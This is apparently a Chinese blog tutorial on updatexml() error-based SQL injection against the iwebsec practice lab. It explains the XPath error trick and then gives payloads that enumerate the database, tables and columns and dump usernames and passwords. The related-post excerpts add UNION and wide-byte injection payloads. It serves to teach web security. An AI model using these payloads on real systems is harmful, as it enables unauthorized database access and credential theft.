iwebsec-updatexml报错注入

原创已于 2025-10-25 00:44:41 修改 · 598 阅读

2 ·

CC 4.0 BY-SA版权

文章标签：

#网络安全 #sql

于 2025-03-18 11:15:09 首次发布

网络空间安全专栏收录该内容

10 篇文章

订阅专栏

原理分析

Updatexml()函数“updatexml(XML_document, XPath_string, new_value);”

参数	描述
XML_document	String格式，为XML文档对象的名称，文中为Doc
XPath_string	Xpath格式的字符串
new_value	String格式，替换查找到的符合条件的数据

即sql语句为“select updatexml(1,concat(0x7e,(SELECT user()),0x7e),1”
concat()函数是将其连成一个字符串，因此不会符合XPATH_string的格式，从而出现格式错误，爆出用户
0x7eASCII码，实为~，upadtexml()报错信息为特殊字符、字母及之后的内容，为了前面字母丢失，开头连接一个特殊字符~

实战注入

1.判断是否存在漏洞，添加and 1=1# 页面正常回显，and 1=2# 页面回显异常，即存在sql注入漏洞

2.爆出数据库

id=1 and (updatexml(1,concat('~',(select database())),3))#

3.爆出表

id=1 and (updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schame=database())),3))#

4.爆出users表字段

id=1 and (updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='users')),3))#

5.爆数据

id=1 and (updatexml(1,concat('~',(select group_concat(username,',',password) from users)),3))#

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

拾柒SHY

关注关注

7
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

iwebsec--sql注入漏洞

追求卓越，技术流~

11-20

1992

sql注入漏洞

iwebsec靶场SQL注入-updatexml注入

qq_56041380的博客

03-27

626

updatexml注入也是一种报错注入，它利用updatexml函数中的第二个参数Xpath_string的报错进行注入。Xpath_string是XML文档路径，格式是/XXX/XXX/XXX/,如果格式不正确就会报错。

参与评论您还未登录，请先登录后发表或查看评论

SQL注入----报错注入简介（updatexml）

一只web狗

06-21

3780

报错注入（updatexml）常用语句

MYSQL updatexml()函数报错注入解析

09-09

主要介绍了MYSQL updatexml()函数报错注入解析，并且简单介绍了updatexml函数，具有一定参考价值，需要的朋友可以了解下。

updatexml报错注入

q1314q520q的博客

08-12

761

updatexml报错注入的使用。

updatexml()报错注入

最新发布

haishiqiguai的博客

04-28

1676

报错注入（Error-based SQL Injection）是一种通过故意触发数据库错误，并利用错误信息中泄露的敏感数据来实施攻击的SQL注入技术。其核心原理是利用数据库的异常处理机制，将攻击者需要的数据嵌入错误信息中返回。

SQL注入漏洞 | updatexml报错注入

weixin_52116519的博客

12-09

1240

XMLXML 被设计用来传输和存储数据，是各种应用程序之间进行数据传输的最常用的工具。xpathXPath 是一门在 XML 文档中查找信息的语言。XPath 使用路径表达式来选取 XML 文档中的节点或者节点集。这些路径表达式和我们在常规的电脑文件系统中看到的表达式非常相似。语法格式第一个参数：XML_document是String格式，为XML文档对象的名称第二个参数：XPath_string ，代表路径，Xpath格式的字符串，例如。

记一次简单的 updatexml报错注入

cxk

03-24

2256

朋友发的，问怎么注入有大佬发了，报错注入。那就来锤他 UPDATEXML (XML_document, XPath_string, new_value); 第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc 第二个参数：XPath_string (Xpath格式的字符串) ，如果不了解Xpath语法，可以在网上查找教程。第三个参数：new_value...

SQL注入之floor报错注入以及各个部分详细分析 + iwebsec 实例分析 + updatexml() 报错 + extractvalue() 报错

m0_50917178的博客

12-09

4337

文章目录前言一、什么是floor报错注入二、利用iwebsec模拟实际注入过程三、updatexml()和extractvalue()报错注入四、问题前言本文为作者的学习笔记，主要介绍了floor注入原理，利用注入代码（payload）分析每个部分的作用以此来解释floor注入的原理。在解释过程中会使用phpstudy搭建的MySQL环境，并且利用iwebsec漏洞库来实践。最后顺带介绍updatexml和extractvalue报错注入。提示：以下是本篇文章正文内容，下面案例可供参考一、什么是

CTF学习笔记21：iwebsec-文件上传漏洞-06-文件截断上传

lvx++的博客

03-18

1404

一、通过burpsuite改扩展名等方法不能上传二、用burpsuite配合%00上传（一）在前缀框输入：6.php%00，如果为空则上传文件保存为"_随机数字+.jpg"的图片文件（二）在filename处也加入%00.gif （三）在path段，选中%00右击，选择URL-decode，否则会将%00作为普通字符处理（四）点击forward上传成功（五）虽然提示路和文件名中包含随机数字和jpg，但实际上传的文件名仅为6.php 三、测试连接测试连接成功 ...

iwebsec靶场SQL注入-bool盲注

qq_56041380的博客

03-24

565

bool注入是盲注的一种。它于报错注入不同，布尔注入没有任何报错信息输出，页面返回只有正常和不正常两种状态，攻击者只能通过返回的这两种状态来对其进行判断输入的SQL注入语句是否正确，从而判断数据库中存储了那些信息。

sqli-labs less-17 updatexml()报错注入

cuddlylm的博客

04-02

1827

这题相比前面的11到15关由原来的登陆注册框变成了现在的重置密码框首先阅读源码发现该题先审查user name的值，只有当user name的值是真值的时候才会处理下一步的new password 重点引入了update函数 $update="UPDATE users SET password = '$passwd' WHERE username='$row1'"; 这个函数的作用就是更新数据库 updatexml()函数 UPDATEXML (XML_document, XPath_string,.

SQL报错注入之updatexml

2301_78549931的博客

08-05

3192

第一个参数：XML的内容第二个参数：是需要update的位置XPATH路径第三个参数：是更新后的内容所以第一和第三个参数可以随便写，只需要利用第二个参数，他会校验你输入的内容是否符合XPATH格式，当我们输入一个不符合xpath语法的语句就报错了，我们注入利用的就是这一点。

【sqli-labs】Less 5——报错注入（updatexml()函数）

用博客做做记录的小白

06-23

3058

sqli-labs靶场第五关less 5，使用报错注入函数updatexml()进行报错注入，注入类型为单引号字符型。

sql盲注_updateXml报错注入

sugar_by的博客

06-03

635

函数updatexml(XML_document,XPath_string,new_value)包含三个参数第一个参数是string格式，为XML文档对象名称，例如doc 第二个参数是路径第三个参数是替换查找符合条件的数据 updatexml报错原理同extractvalue()一样sql盲注_extractvalue报错注入输入错误第二个参数，即更改路径的符号正常语句错误语句利用updatexml()报错注入判断字符型/数据型判断闭合方式可以判断为双引号闭合查看有多少列查询数据

sqli-labs-报错注入-updatexml报错

weixin_51706044的博客

03-14

1524

文章目录前言一、updatexml报错二、updatexml报错记忆前言 union注入是最简单方便的,但是要求页面必须有显示位,没有就没法利用. 所以当页面没有显示位时,我们需要用其他方法来获取数据.因此我们可以使用报错注入: 有些网站在开发调试阶段开启了报错提示信息,如果没有关闭,就有可能存在报错注入. 报错注入函数: floor函数 extractvalue报错 updatexml报错今天我在这里先记录一下对于updatexml报错函数的学习一、updatexml报错基本格式: ?id=

报错注入updatexml函数使用

weixin_43326436的博客

06-03

4197

一. floor()、extractvalue()、updatexml() 函数都是与报错注入有关二.updatexml函数使用方式: UPDATEXML (XML_document, XPath_string, new_value); 第一个参数：XML_document是String格式，为XML文档对象的名称。第二个参数：XPath_string (Xpath格式的字符串) 。第三个参数：new_value，String格式，替换查找到的符合条件的数据作用：改变文档中符合条件的节点的值。还

报错注入（extractvalue,updatexml)

m0_73477772的博客

05-10

888

但是我们将第二个参数的斜杠替换为另外的符号extractvalue（doc,'~book/author/surname')例如：concat(1，2）的作用是将1，2两个位置的数据拼接起来，0x7e是’~‘的ascll码。这时候我们在第二个参数的位置加入SQL语句，则会返回我们想要的信息。第三个参数：new_value,string格式，替换查找到的符合条件的数据。第一个参数doc XML文档对象名称，第二个参数'____' 路径。如果我们把第二个参数的路径拼写错误，它会查不到内容但不会报错。

SQL注入之updatexml报错注入（函数解释）

m0_74608722的博客

06-05

1330

第二个参数 xml路径是可操作的地方，xml文档中路径是用 /xxx/xxx/xxx/…这种格式，如果我们写入其他格式，就会报错，并且会返回我们写入的非法格式内容，而这个非法的内容就是我们想要查询的内容。原因：是因为updatexml（1，database(),1)这种书写的语法格式是正确的，所以不会爆出语法错误，在SQL注入中无法得到想要的库、表、列名（为了得到他们，应该怎样书写呐？正常查询第二个参数的格式为 /xxx/xx/xx/xx ，即使查询不到也不会报错。

iwebsec靶场SQL注入漏洞-字符型注入

02-24

### 关于iwebsec靶场中字符型SQL注入漏洞分析在探讨iwebsec靶场中的字符型SQL注入漏洞时，需理解其核心在于利用特定字符串构造来绕过输入验证机制并执行恶意查询。当应用程序未能正确处理特殊字符或未对用户输入做充分过滤时，攻击者可以通过提交精心设计的数据引发数据库错误或获取敏感信息。对于字符型注入而言，在构建测试用语句时通常会附加单引号 `'` 来闭合原有查询条件，并通过联合选择 `UNION SELECT` 或其他方法尝试读取额外的信息[^5]。例如： ```sql ?id=1' UNION SELECT 1,2,3--+ ``` 此命令试图关闭原始查询并通过追加新的SELECT子句返回自定义的结果集；然而，如果结尾处缺少必要的注释符号（即双连字符 `--`），这可能导致语法不匹配从而引起服务器端异常响应。为了进一步探索目标系统的结构以及潜在的安全弱点，可以采用如下策略来进行更深入的渗透测试： - **确认注入点**：先确定是否存在可被利用的位置，比如上述提到的ID参数。 - **探测列数**：使用ORDER BY指令调整输出顺序直至找到最大有效索引值，以此推断出内部表格所含有的字段数目。如下面的例子展示了如何检测第四列为上限的情况： ```php /sqli/02.php?id=-1%df%27%20order%20by%204--+ ``` - **提取元数据**：一旦知道了表内有多少个属性，则可通过GROUP_CONCAT()函数一次性抓取多个记录的内容。这里给出了一种方式用于收集用户名和密码组合： ```sql ?id=-1 UNION SELECT 1,2,GROUP_CONCAT(CONCAT_WS(0x7E,username,password)) FROM iwebsec.user-- ``` 值得注意的是，以上操作均基于假设环境下的实验性质活动，并非真实世界里的合法行为。实际开发过程中应当遵循安全编码实践以防止此类风险的发生，同时定期审查现有防护措施的有效性。 #### 宽字节注入技巧考虑到某些情况下Web应用可能运行在一个特殊的字符集环境中（如GBK），此时还可以运用所谓的“宽字节注入”。这种技术依赖于多字节字符集中存在的特性——部分字符由两个连续字节组成，其中一个可能是反斜杠 `\` ，它作为转义符会影响后续字符解释的方式[^4]。具体来说就是发送形似 `%DF'` 的请求片段给服务端解析器，后者会在遇到这样的序列之前插入一个反斜杠变成类似于 `%DF\%'` 这样的形式。而在GBK编码下，这个新产生的三字节串正好对应着某个有效的汉字，因此整个表达式不会触发任何报警而是按照预期逻辑继续向下执行下去。